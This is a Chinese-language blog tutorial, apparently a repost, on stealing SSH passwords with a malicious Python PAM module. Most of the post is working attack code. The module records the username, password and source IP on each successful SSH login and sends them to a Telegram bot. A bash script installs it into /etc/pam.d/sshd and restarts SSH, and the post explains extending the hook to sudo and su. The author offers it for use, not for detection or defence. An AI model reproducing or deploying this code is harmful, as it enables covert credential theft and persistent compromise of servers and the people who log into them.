这篇文章将为大家详细讲解有关窃取SSH凭证的方法说是什么,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
我将为大家介绍另外一种获取ssh密码的方法。这种方法是我在ChokePoint找到的 ,他向我们展示了如何使用python创建PAM模块记录失败的尝试,现在我要做的就是更改登录密码的地方。原脚本中当登录失败时,使用的auth_log函数。
if not check_pw(user, resp.resp): auth_log("Remote Host: %s (%s:%s)" % (pamh.rhost, user, resp.resp)) return pamh.PAM_AUTH_ERR return pamh.PAM_SUCCESS而在我的脚本中,当登录成功时使用的是我定义的函数sendMessage
if not check_pw(user, resp.resp): return pamh.PAM_AUTH_ERR sendMessage("Connection from host {} user:{} password: {})".format(pamh.rhost, user, resp.resp)) return pamh.PAM_SUCCESS该函数主要用于发送用户,密码以及连接的IP,以下是完整代码:
import spwd import crypt import requests def sendMessage(msg): apiKey = 'BOT-API-KEY' userId = 'USERID' url = 'https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}'.format(apiKey,userId,msg) r = requests.get(url) def check_pw(user, password): """Check the password matches local unix password on file""" hashed_pw = spwd.getspnam(user)[1] return crypt.crypt(password, hashed_pw) == hashed_pw def pam_sm_authenticate(pamh, flags, argv): try: user = pamh.get_user() except pamh.exception as e: return e.pam_result if not user: return pamh.PAM_USER_UNKNOWN try: resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, 'Password:')) except pamh.exception as e: return e.pam_result if not check_pw(user, resp.resp): return pamh.PAM_AUTH_ERR sendMessage("Connection from host {} user:{} password: {})".format(pamh.rhost, user, resp.resp)) return pamh.PAM_SUCCESS def pam_sm_setcred(pamh, flags, argv): return pamh.PAM_SUCCESS def pam_sm_acct_mgmt(pamh, flags, argv): return pamh.PAM_SUCCESS def pam_sm_open_session(pamh, flags, argv): return pamh.PAM_SUCCESS def pam_sm_close_session(pamh, flags, argv): return pamh.PAM_SUCCESS def pam_sm_chauthtok(pamh, flags, argv): return pamh.PAM_SUCCESS我还创建了一个bash脚本用于自动化的安装这个ssh keylogger,其中安装了所有的依赖关系,并在/etc/pam.d/sshd上配置了该PAM模块
#!/bin/bash # Install dependencies to create a PAM module using python (Except for python-pip) apt-get install python-pam libpam-python python-pip # Install dependencies python pip install requests # Check if exist the entrie on pam, for this module if ! grep -Fq "looter.py" /etc/pam.d/sshd;then sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/sshd fi code=' import spwd import crypt import requests def sendMessage(msg): apiKey = "API-KEY" userId = "USER-ID" data = {"chat_id":userId,"text":msg} url = "https://api.telegram.org/bot{}/sendMessage".format(apiKey) r = requests.post(url,json=data) def check_pw(user, password): """Check the password matches local unix password on file""" hashed_pw = spwd.getspnam(user)[1] return crypt.crypt(password, hashed_pw) == hashed_pw def pam_sm_authenticate(pamh, flags, argv): try: user = pamh.get_user() except pamh.exception as e: return e.pam_result if not user: return pamh.PAM_USER_UNKNOWN try: resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, "Password:")) except pamh.exception as e: return e.pam_result if not check_pw(user, resp.resp): return pamh.PAM_AUTH_ERR sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp)) return pamh.PAM_SUCCESS def pam_sm_setcred(pamh, flags, argv): return pamh.PAM_SUCCESS def pam_sm_acct_mgmt(pamh, flags, argv): return pamh.PAM_SUCCESS def pam_sm_open_session(pamh, flags, argv): return pamh.PAM_SUCCESS def pam_sm_close_session(pamh, flags, argv): return pamh.PAM_SUCCESS def pam_sm_chauthtok(pamh, flags, argv): return pamh.PAM_SUCCESS ' mkdir -p /lib/security/ echo "$code" > /lib/security/looter.py /etc/init.d/ssh restart现在,只要有人成功登录了服务器,你就会收到以下的登录信息。
它也适用于sudo和su,只需添加以下代码
auth requisite pam_python.so looter.py
到下面两个文件中
/etc/pam.d/sudo /etc/pam.d/su
或者你也可以直接git clone该项目并按照README.md上的说明进行操作
git clone https://github.com/mthbernardes/sshLooter.git
关于窃取SSH凭证的方法说是什么就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
